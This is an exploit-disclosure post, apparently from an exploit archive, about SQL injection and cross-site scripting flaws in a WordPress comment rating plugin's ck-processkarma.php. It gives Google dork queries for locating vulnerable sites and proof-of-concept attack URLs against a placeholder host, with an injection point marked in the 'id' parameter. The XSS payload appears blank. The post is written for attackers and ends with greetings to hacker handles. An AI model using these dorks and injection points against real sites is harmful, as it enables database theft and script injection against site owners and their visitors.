# Exploit Title: Wordpress comment rating plugin multiple Vulnerabilities # Google Dork: 1- inurl:"/wp-content/plugins/comment-rating/" # 2- inurl:"/ck-processkarma.php?id=" # Date: 2/1/2012 # Author: The Evil Thinker # Contact : Enstene156@hotmail.fr # Software Link: www.wordpress.com # Vulnerable plugin: Comment rating plugin # Tested on: Linux Details : --------- the vulnerable file is "ck-processkarma.php" the script doesn't filter the input parameters (id "sql", path "XSS") Poc 1 (XSS) : http://www.TheMilkeyWay.exe/wp-content/plugins/comment-rating/ck-processkarma.php?id=[Integer Value]&action=add&path=&imgIndex= Poc 2 (SQL injection) : http://www.TheMilkeyWay.exe/wp-content/plugins/comment-rating/ck-processkarma.php?id=[Integer Value]*****Inject_me_From_Here*****&action=add&path=TheMilkeyWay.exe/wp-content/plugins/comment-rating/&imgIndex= ------------------------------------------------------------------------------------------- Special Graetz : Zack (DBA-HACKER) , Siper-N , Root-Mar , Anash , H!ch4m , Dr.Unknown , Mario-Gomez , BiiF0 , o Bla mantawel LLista